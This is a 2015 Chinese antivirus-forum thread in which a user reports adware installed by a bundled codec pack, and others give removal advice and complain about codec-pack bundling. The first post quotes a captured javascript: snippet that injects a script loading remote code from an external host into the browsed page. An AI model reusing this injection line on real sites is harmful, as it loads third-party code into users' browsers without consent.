查看: 3042|回复: 16
收起左侧

[其他] 中病毒了,这个病毒很嘲讽啊

[复制链接]
f1555
发表于 2015-9-29 21:37:21 | 显示全部楼层 |阅读模式
本帖最后由 f1555 于 2015-9-29 22:06 编辑

javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apifreshestoutlo-a.akamaihd.net/gsrs?is=smp1cn&bp=BA&g=ee278a35-2fc9-4f69-ad12-451297194b15";a[0].appendChild(d);}}}catch(e){}x
这个是不小心抓到的,我在输入的时候自动复制到地址栏了


这是图片地址,如果图挂了请到这里看下:tieba.baidu.com/p/4072511278?see_lz=1
还会关闭我的浏览器!!
STANDARD_Codecs_v286.exe(罪魁祸首吧)
我断网杀毒了。。。,希望能好
f1555
 楼主| 发表于 2015-9-29 21:40:04 | 显示全部楼层
本帖最后由 f1555 于 2015-9-29 21:42 编辑

file:C:\Users\Kill4peacE.Kill4peacE-PC\AppData\Local\Temp\nsoE0EC.tmp\install51444.exe
process:pid:3376,ProcessStart:130880033950445077
样本没了
ericdj
发表于 2015-9-29 21:58:08 | 显示全部楼层
图挂了
chānwàng
发表于 2015-9-29 22:06:41 | 显示全部楼层
本帖最后由 chānwàng 于 2015-9-29 22:07 编辑

STANDARD_Codecs_v286.exe 如果是在官网下载的请用7Z解压后找里面的exe或者msi安装包安装即可去除捆绑的插件。

或者你可以换一个解码包工具。我用的是LAV Filters
f1555
 楼主| 发表于 2015-9-29 22:06:55 | 显示全部楼层

好了。。
f1555
 楼主| 发表于 2015-9-29 22:12:20 | 显示全部楼层
chānwàng 发表于 2015-9-29 22:06
STANDARD_Codecs_v286.exe 如果是在官网下载的请用7Z解压后找里面的exe或者msi安装包安装即可去除捆绑的插 ...

哦,只能算流氓软件了。。官网都有捆绑,好流氓啊!!
f1555
 楼主| 发表于 2015-9-29 22:12:40 | 显示全部楼层
chānwàng 发表于 2015-9-29 22:06
STANDARD_Codecs_v286.exe 如果是在官网下载的请用7Z解压后找里面的exe或者msi安装包安装即可去除捆绑的插 ...

我已经中招了,如何解决呢
chānwàng
发表于 2015-9-30 00:33:58 | 显示全部楼层
f1555 发表于 2015-9-29 22:12
我已经中招了,如何解决呢

手动删除看看能不能。先看下是不是存在可疑浏览器插件。再看后台进程有木有可疑的。或者可以看控制面板厘米看有木有卸载项 。
dej.sf
头像被屏蔽
发表于 2015-9-30 03:46:49 | 显示全部楼层
f1555 发表于 2015-9-29 22:12
哦,只能算流氓软件了。。官网都有捆绑,好流氓啊!!

现在鲨鱼的解码包会捆绑4个插件,而且是分两次安装的。很多人以为第一次取消捆绑后面就没事了……
liweichen6
发表于 2015-9-30 04:22:23 | 显示全部楼层
K-Lite飘过
最早没捆绑
然后有捆绑可以一次全取消掉
现在要一个个取消……
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-15 06:33 , Processed in 0.125792 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表